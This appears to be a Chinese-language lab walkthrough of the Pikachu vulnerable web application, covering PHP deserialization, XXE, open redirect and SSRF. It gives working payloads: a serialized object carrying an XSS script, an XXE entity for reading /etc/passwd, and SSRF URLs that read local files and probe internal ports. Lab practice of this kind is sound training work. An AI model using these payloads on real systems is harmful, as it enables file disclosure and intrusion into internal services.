PHP反序列化漏洞
直接找个payload来用
O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}
//O:1 O代表object,1代表对象名字长度为1个字符
//S:1 S代表对象的名称,1代表对象里有1个变量
//s 数据类型,4 变量名称长度,test 变量名称
XXE
按照xml文档语法构造payload,读取passwd文件
<?xml version="1.0"?>
<!DOCTYPE xxe [
<!ENTITY xxe SYSTEM "filD:///etc/passwd">
]>
<test>&xxe;</test>
URL重定向
不安全的url跳转
链接后带有url参数,修改url参数为跳转地址即可
要加http/https,添加url参数为想要跳转的网页
http://192.168.48.130/vul/urlredirect/urlredirect.php?url=http://www.baidu.com
发送后成功跳转
SSRF
SSRF(curl)
先开这句话,发现没有诗出来,看了下url好像有些问题,多了个/vul,删除后即可
http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/vul/ssrf/ssrf_info/info1.php
http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://127.0.0.1/vul/ssrf/ssrf_info/info1.php
可以通过修改url的参数来实现服务器对其他地址发起请求
访问pikachu服务器的其他端口/访问云服务器的22端口
http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://192.168.48.130:82
http://192.168.48.130/vul/ssrf/ssrf_curl.php?url=http://192.168.48.130:22
SSRF(file_get_content)
这个同样需要改下url才可以访问到内容
修改url直接访问目录,从 ‘file=’ 后开始
http://192.168.48.130/vul/ssrf/ssrf_fgc.php?file=///etc/passwd